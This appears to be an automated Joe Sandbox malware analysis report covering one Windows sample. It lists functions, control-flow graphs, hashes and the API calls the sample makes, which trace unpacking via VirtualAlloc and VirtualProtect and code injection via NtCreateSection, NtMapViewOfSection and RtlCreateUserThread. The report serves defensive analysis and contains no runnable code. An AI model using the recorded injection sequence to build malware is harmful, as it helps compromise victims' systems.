                                • Opcode Fuzzy Hash: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                • Instruction Fuzzy Hash: DE51F9B5900245BBEF209F91CC88FEFBBB8FF85B10F104259F911AA2A5D6709944CB64
                                Function 00402FE9 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 467 402fe9-40300d 468 403140-403145 467->468 469 403013-40302b 467->469 469->468 470 403031-403042 469->470 471 403044-40304d 470->471 472 403052-403060 471->472 472->472 473 403062-403069 472->473 474 40308b-403092 473->474 475 40306b-40308a 473->475 476 4030b4-4030b7 474->476 477 403094-4030b3 474->477 475->474 478 4030c0 476->478 479 4030b9-4030bc 476->479 477->476 478->471 481 4030c2-4030c7 478->481 479->478 480 4030be 479->480 480->481 481->468 482 4030c9-4030cc 481->482 482->468 483 4030ce-40313d RtlCreateUserThread NtTerminateProcess 482->483 483->468
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1721477579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                Similarity
                                • API ID: CreateProcessTerminateThreadUser
                                • String ID:
                                • API String ID: 1921587553-0
                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                • Instruction ID: 3e1675bac70c022a4e457ffe6b5fa54937b73e0116388ba90aec32851b4d9964
                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                • Instruction Fuzzy Hash: A1412431228E088FD768EF5CA885762B7D5F798311F6643AAE809D7389EA34DC1183C5
                                Function 02BA98DD Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 484 2ba98dd-2ba98f6 485 2ba98f8-2ba98fa 484->485 486 2ba98fc 485->486 487 2ba9901-2ba990d CreateToolhelp32Snapshot 485->487 486->487 488 2ba990f-2ba9915 487->488 489 2ba991d-2ba992a Module32First 487->489 488->489 495 2ba9917-2ba991b 488->495 490 2ba992c-2ba992d call 2ba959c 489->490 491 2ba9933-2ba993b 489->491 496 2ba9932 490->496 495->485 495->489 496->491
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02BA9905
                                • Module32First.KERNEL32(00000000,00000224), ref: 02BA9925
                                Memory Dump Source
                                • Source File: 00000000.00000002.1722703723.0000000002BA2000.00000040.00000020.00020000.00000000.sdmp, Offset: 02BA2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2ba2000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                • String ID:
                                • API String ID: 3833638111-0
                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                • Instruction ID: 911fa3f9947de8f2466853f66f14130720ffd1f521b95635a5bdef132b4d7db4
                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                • Instruction Fuzzy Hash: 3DF09032204B147BEB203BF9AC9DBAF76ECFF49624F1005A9E756910C0DB70E9459A61
                                Function 029A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 29a003c-29a0047 1 29a0049 0->1 2 29a004c-29a0263 call 29a0a3f call 29a0e0f call 29a0d90 VirtualAlloc 0->2 1->2 17 29a028b-29a0292 2->17 18 29a0265-29a0289 call 29a0a69 2->18 20 29a02a1-29a02b0 17->20 22 29a02ce-29a03c2 VirtualProtect call 29a0cce call 29a0ce7 18->22 20->22 23 29a02b2-29a02cc 20->23 29 29a03d1-29a03e0 22->29 23->20 30 29a0439-29a04b8 VirtualFree 29->30 31 29a03e2-29a0437 call 29a0ce7 29->31 33 29a04be-29a04cd 30->33 34 29a05f4-29a05fe 30->34 31->29 36 29a04d3-29a04dd 33->36 37 29a077f-29a0789 34->37 38 29a0604-29a060d 34->38 36->34 40 29a04e3-29a0505 36->40 41 29a078b-29a07a3 37->41 42 29a07a6-29a07b0 37->42 38->37 43 29a0613-29a0637 38->43 51 29a0517-29a0520 40->51 52 29a0507-29a0515 40->52 41->42 44 29a086e-29a08be LoadLibraryA 42->44 45 29a07b6-29a07cb 42->45 46 29a063e-29a0648 43->46 50 29a08c7-29a08f9 44->50 48 29a07d2-29a07d5 45->48 46->37 49 29a064e-29a065a 46->49 53 29a07d7-29a07e0 48->53 54 29a0824-29a0833 48->54 49->37 55 29a0660-29a066a 49->55 58 29a08fb-29a0901 50->58 59 29a0902-29a091d 50->59 60 29a0526-29a0547 51->60 52->60 61 29a07e2 53->61 62 29a07e4-29a0822 53->62 57 29a0839-29a083c 54->57 56 29a067a-29a0689 55->56 63 29a068f-29a06b2 56->63 64 29a0750-29a077a 56->64 57->44 65 29a083e-29a0847 57->65 58->59 66 29a054d-29a0550 60->66 61->54 62->48 67 29a06ef-29a06fc 63->67 68 29a06b4-29a06ed 63->68 64->46 69 29a084b-29a086c 65->69 70 29a0849 65->70 72 29a05e0-29a05ef 66->72 73 29a0556-29a056b 66->73 76 29a074b 67->76 77 29a06fe-29a0748 67->77 68->67 69->57 70->44 72->36 74 29a056f-29a057a 73->74 75 29a056d 73->75 78 29a059b-29a05bb 74->78 79 29a057c-29a0599 74->79 75->72 76->56 77->76 84 29a05bd-29a05db 78->84 79->84 84->66
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 029A024D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1722456643.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: cess$kernel32.dll
                                • API String ID: 4275171209-1230238691
                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                • Instruction ID: 15dd72cf82fc5166a085e7503a59c84fac88b07ac89aea4646bc2deaa0509cbd
                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                • Instruction Fuzzy Hash: 26527974A01229DFDB64CF68C994BACBBB1BF09304F1480D9E94DAB351DB30AA95CF54
                                Function 029A0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 497 29a0e0f-29a0e24 SetErrorMode * 2 498 29a0e2b-29a0e2c 497->498 499 29a0e26 497->499 499->498
                                APIs
                                • SetErrorMode.KERNELBASE(00000400,?,?,029A0223,?,?), ref: 029A0E19
                                • SetErrorMode.KERNELBASE(00000000,?,?,029A0223,?,?), ref: 029A0E1E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1722456643.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorMode
                                • String ID:
                                • API String ID: 2340568224-0
                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                • Instruction ID: 91407c7c25d1176a7ac32c2b20d2d680231b239d56b718290677dbbec1f824e6
                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                • Instruction Fuzzy Hash: 85D01232245228B7DB402A94DC09BCEBB1CDF09BA6F108021FB0DE9080CBB09A4046EA
                                Function 00401918 Relevance: 1.3, APIs: 1, Instructions: 57sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 592 401918-401943 597 401946-40197b call 4011b7 Sleep call 40143e 592->597 598 40193a-40193f 592->598 606 40198a-4019d3 call 4011b7 597->606 607 40197d-401985 call 401538 597->607 598->597 607->606
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                Memory Dump Source
                                • Source File: 00000000.00000002.1721477579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                • Instruction ID: 41df8370e0b5f9a47a14a91e784646d83bdfa422f97ac69dcfec837627d5bcb0
                                • Opcode Fuzzy Hash: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                • Instruction Fuzzy Hash: 6D018CF520C148E7EB016A948DB1EBA36299B45324F300233B647B91F4C57C8A03E76F
                                Function 00401924 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 621 401924-401943 625 401946-40197b call 4011b7 Sleep call 40143e 621->625 626 40193a-40193f 621->626 634 40198a-4019d3 call 4011b7 625->634 635 40197d-401985 call 401538 625->635 626->625 635->634
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                Memory Dump Source
                                • Source File: 00000000.00000002.1721477579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                • Instruction ID: 34fc3aff5e218d4630d956a4f9c4c41b7245144a44faa4fd8074b33eba8f9d72
                                • Opcode Fuzzy Hash: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                • Instruction Fuzzy Hash: 43017CF5208145E7EB015A948DB0EBA26299B45314F300237B617BA1F4C57D8602E76F
                                Function 02BA959C Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02BA95ED
                                Memory Dump Source
                                • Source File: 00000000.00000002.1722703723.0000000002BA2000.00000040.00000020.00020000.00000000.sdmp, Offset: 02BA2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2ba2000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                • Instruction ID: 4dc8d4dd0ee24a86712e3da7236f9495bba3d7d708de9b5e5c823ba7f42edd72
                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                • Instruction Fuzzy Hash: 10113C79A00208EFDB01DF98C995E98BBF5EF08350F058094F9489B361D371EA50EF80
                                Function 00401941 Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                Memory Dump Source
                                • Source File: 00000000.00000002.1721477579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                • Instruction ID: 53d82b158b021bc4b6cde56962adc0b8c8d23177238c0d6ee964112a53f005ae
                                • Opcode Fuzzy Hash: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                • Instruction Fuzzy Hash: 38F0AFB6308249F7DB01AA908DB1EBA36299B54315F300633B617B91F5C57C8A12E76F
                                Function 00401954 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                Memory Dump Source
                                • Source File: 00000000.00000002.1721477579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                • Instruction ID: f7568a5a22988f4b084f7ac8228f9b89e575eda69d31bfffabc36cd9cbe45c64
                                • Opcode Fuzzy Hash: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                • Instruction Fuzzy Hash: BDF0C2B6208144F7DB019AA18DB1FBA36299B44314F300233BA17B90F5C67C8612E76F
                                Function 0040194C Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                Memory Dump Source
                                • Source File: 00000000.00000002.1721477579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                • Instruction ID: 9d6088553fbd849a34ffa1589a5f9bffd683413c7e042594889390f4c4f3f426
                                • Opcode Fuzzy Hash: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                • Instruction Fuzzy Hash: 08F0C2B2208144F7DB019A958DA0FBA36299B44314F300633B617B91F5C57C8A02E72F

                                Non-executed Functions

                                Function 029A092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1722456643.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .$GetProcAddress.$l
                                • API String ID: 0-2784972518
                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                • Instruction ID: 743bdedc84902a051acb48d71d3650dcdee7e904cc0b25bf97e1c0ab6febc2e5
                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                • Instruction Fuzzy Hash: B13115B6900709DFEB10CF99C884BAEBBF9FF48324F15404AD841A7210D771AA45CBA4
                                Function 02BA91BA Relevance: .1, Instructions: 61COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1722703723.0000000002BA2000.00000040.00000020.00020000.00000000.sdmp, Offset: 02BA2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2ba2000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                • Instruction ID: 813090f42a888335a4da5defc986512d88ce2e4f8df0b1673acac8cf7fa93a88
                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                • Instruction Fuzzy Hash: F7115E72344600AFD754DF55DC91FA673EAFB89324B1980A9ED04CB315D675E841CB60
                                Function 029A0D90 Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1722456643.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                • Instruction ID: beb63eb014f30fa0b5be0263c4bf051cc8457e263ea5aa80f7a5df96644cdaf9
                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                • Instruction Fuzzy Hash: 9B01A277A117048FDF21CF24C818BAA33E9EF86216F5544A9D90A9B281E774A9418BD0

                                Execution Graph

                                Execution Coverage:7.6%
                                Dynamic/Decrypted Code Coverage:29.3%
                                Signature Coverage:0%
                                Total number of Nodes:99
                                Total number of Limit Nodes:2
                                execution_graph 3739 401543 3740 401546 3739->3740 3741 4015e6 NtDuplicateObject 3740->3741 3749 401702 3740->3749 3742 401603 NtCreateSection 3741->3742 3741->3749 3743 401683 NtCreateSection 3742->3743 3744 401629 NtMapViewOfSection 3742->3744 3746 4016af 3743->3746 3743->3749 3744->3743 3745 40164c NtMapViewOfSection 3744->3745 3745->3743 3747 40166a 3745->3747 3748 4016b9 NtMapViewOfSection 3746->3748 3746->3749 3747->3743 3748->3749 3750 4016e0 NtMapViewOfSection 3748->3750 3750->3749 3807 402e63 3808 402e67 3807->3808 3809 401918 8 API calls 3808->3809 3810 402f44 3808->3810 3809->3810 3799 401924 3800 401929 3799->3800 3801 40195e Sleep 3800->3801 3802 401979 3801->3802 3803 401538 7 API calls 3802->3803 3804 40198a 3802->3804 3803->3804 3687 402fe9 3688 403140 3687->3688 3689 403013 3687->3689 3689->3688 3690 4030ce RtlCreateUserThread NtTerminateProcess 3689->3690 3690->3688 3805 445092b GetPEB 3806 4450972 3805->3806 3721 401496 3722 401447 3721->3722 3722->3721 3723 4015e6 NtDuplicateObject 3722->3723 3731 40152f 3722->3731 3724 401603 NtCreateSection 3723->3724 3723->3731 3725 401683 NtCreateSection 3724->3725 3726 401629 NtMapViewOfSection 3724->3726 3728 4016af 3725->3728 3725->3731 3726->3725 3727 40164c NtMapViewOfSection 3726->3727 3727->3725 3729 40166a 3727->3729 3730 4016b9 NtMapViewOfSection 3728->3730 3728->3731 3729->3725 3730->3731 3732 4016e0 NtMapViewOfSection 3730->3732 3732->3731 3646 402eb7 3647 402eb8 3646->3647 3649 402f44 3647->3649 3650 401918 3647->3650 3651 401929 3650->3651 3652 40195e Sleep 3651->3652 3653 401979 3652->3653 3655 40198a 3653->3655 3656 401538 3653->3656 3655->3649 3657 401539 3656->3657 3658 401702 3657->3658 3659 4015e6 NtDuplicateObject 3657->3659 3658->3655 3659->3658 3660 401603 NtCreateSection 3659->3660 3661 401683 NtCreateSection 3660->3661 3662 401629 NtMapViewOfSection 3660->3662 3661->3658 3664 4016af 3661->3664 3662->3661 3663 40164c NtMapViewOfSection 3662->3663 3663->3661 3665 40166a 3663->3665 3664->3658 3666 4016b9 NtMapViewOfSection 3664->3666 3665->3661 3666->3658 3667 4016e0 NtMapViewOfSection 3666->3667 3667->3658 3668 445003c 3669 4450049 3668->3669 3681 4450e0f SetErrorMode SetErrorMode 3669->3681 3674 4450265 3675 44502ce VirtualProtect 3674->3675 3677 445030b 3675->3677 3676 4450439 VirtualFree 3680 44504be LoadLibraryA 3676->3680 3677->3676 3679 44508c7 3680->3679 3682 4450223 3681->3682 3683 4450d90 3682->3683 3684 4450dad 3683->3684 3685 4450dbb GetPEB 3684->3685 3686 4450238 VirtualAlloc 3684->3686 3685->3686 3686->3674 3691 2888616 3694 288861d 3691->3694 3695 288862c 3694->3695 3698 2888dbd 3695->3698 3703 2888dd8 3698->3703 3699 2888de1 CreateToolhelp32Snapshot 3700 2888dfd Module32First 3699->3700 3699->3703 3701 2888e0c 3700->3701 3702 288861c 3700->3702 3705 2888a7c 3701->3705 3703->3699 3703->3700 3706 2888aa7 3705->3706 3707 2888ab8 VirtualAlloc 3706->3707 3708 2888af0 3706->3708 3707->3708 3708->3708 3709 4014de 3710 401447 3709->3710 3711 4015e6 NtDuplicateObject 3710->3711 3719 40152f 3710->3719 3712 401603 NtCreateSection 3711->3712 3711->3719 3713 401683 NtCreateSection 3712->3713 3714 401629 NtMapViewOfSection 3712->3714 3716 4016af 3713->3716 3713->3719 3714->3713 3715 40164c NtMapViewOfSection 3714->3715 3715->3713 3717 40166a 3715->3717 3718 4016b9 NtMapViewOfSection 3716->3718 3716->3719 3717->3713 3718->3719 3720 4016e0 NtMapViewOfSection 3718->3720 3720->3719

                                Executed Functions

                                Function 00401496 Relevance: 10.7, APIs: 7, Instructions: 247nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 85 401496-4014a5 86 4014a7 85->86 87 40151b-40152d 85->87 88 4014a9-4014b5 86->88 89 4014cf 86->89 96 4014ba 87->96 99 40152f-401535 87->99 91 401471-401472 88->91 92 4014b7-4014b8 88->92 93 4014d6 89->93 97 401473-401484 91->97 95 401449 92->95 92->96 93->93 98 4014d8 93->98 100 40147b-40148e call 4011b7 95->100 101 40144b 95->101 102 401447-401456 96->102 103 4014bc-4014c3 96->103 97->100 98->87 100->85 106 40144c-401470 101->106 102->106 107 4014c5-4014c8 103->107 108 401539-401567 103->108 106->97 107->89 119 401558-401563 108->119 120 40156a-401590 call 4011b7 108->120 119->120 127 401592 120->127 128 401595-40159a 120->128 127->128 130 4015a0-4015b1 128->130 131 4018b8-4018c0 128->131 135 4018b6-4018c5 130->135 136 4015b7-4015e0 130->136 131->128 139 4018da 135->139 140 4018cb-4018d6 135->140 136->135 144 4015e6-4015fd NtDuplicateObject 136->144 139->140 141 4018dd-401915 call 4011b7 139->141 140->141 144->135 146 401603-401627 NtCreateSection 144->146 148 401683-4016a9 NtCreateSection 146->148 149 401629-40164a NtMapViewOfSection 146->149 148->135 153 4016af-4016b3 148->153 149->148 152 40164c-401668 NtMapViewOfSection 149->152 152->148 154 40166a-401680 152->154 153->135 155 4016b9-4016da NtMapViewOfSection 153->155 154->148 155->135 158 4016e0-4016fc NtMapViewOfSection 155->158 158->135 161 401702 call 401707 158->161
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                Memory Dump Source
                                • Source File: 00000005.00000002.2005452469.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_crwjtgt.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectView
                                • String ID:
                                • API String ID: 1652636561-0
                                • Opcode ID: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                • Instruction ID: 8e4940cc2d5d294876689a6a874cb0cc3c399929e81e9dec1e5d288c8cd9e9dd
                                • Opcode Fuzzy Hash: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                • Instruction Fuzzy Hash: F481B375500244BBEB209F91CC44FAB7BB8FF85704F10412AF952BA2F1E7749901CB69
                                Function 00401538 Relevance: 10.7, APIs: 7, Instructions: 207nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 163 401538-401567 169 401558-401563 163->169 170 40156a-401590 call 4011b7 163->170 169->170 177 401592 170->177 178 401595-40159a 170->178 177->178 180 4015a0-4015b1 178->180 181 4018b8-4018c0 178->181 185 4018b6-4018c5 180->185 186 4015b7-4015e0 180->186 181->178 189 4018da 185->189 190 4018cb-4018d6 185->190 186->185 194 4015e6-4015fd NtDuplicateObject 186->194 189->190 191 4018dd-401915 call 4011b7 189->191 190->191 194->185 196 401603-401627 NtCreateSection 194->196 198 401683-4016a9 NtCreateSection 196->198 199 401629-40164a NtMapViewOfSection 196->199 198->185 203 4016af-4016b3 198->203 199->198 202 40164c-401668 NtMapViewOfSection 199->202 202->198 204 40166a-401680 202->204 203->185 205 4016b9-4016da NtMapViewOfSection 203->205 204->198 205->185 208 4016e0-4016fc NtMapViewOfSection 205->208 208->185 211 401702 call 401707 208->211
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                Memory Dump Source
                                • Source File: 00000005.00000002.2005452469.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_crwjtgt.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                • Instruction ID: 71a4d0092025beca94809e07d65936591d52f1bb8effc294688e3fcd05e54c36
                                • Opcode Fuzzy Hash: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                • Instruction Fuzzy Hash: E0615171900204FBEB209F95CC89FAF7BB8FF85700F10412AF912BA2E5D6759905DB65
                                Function 004014DE Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
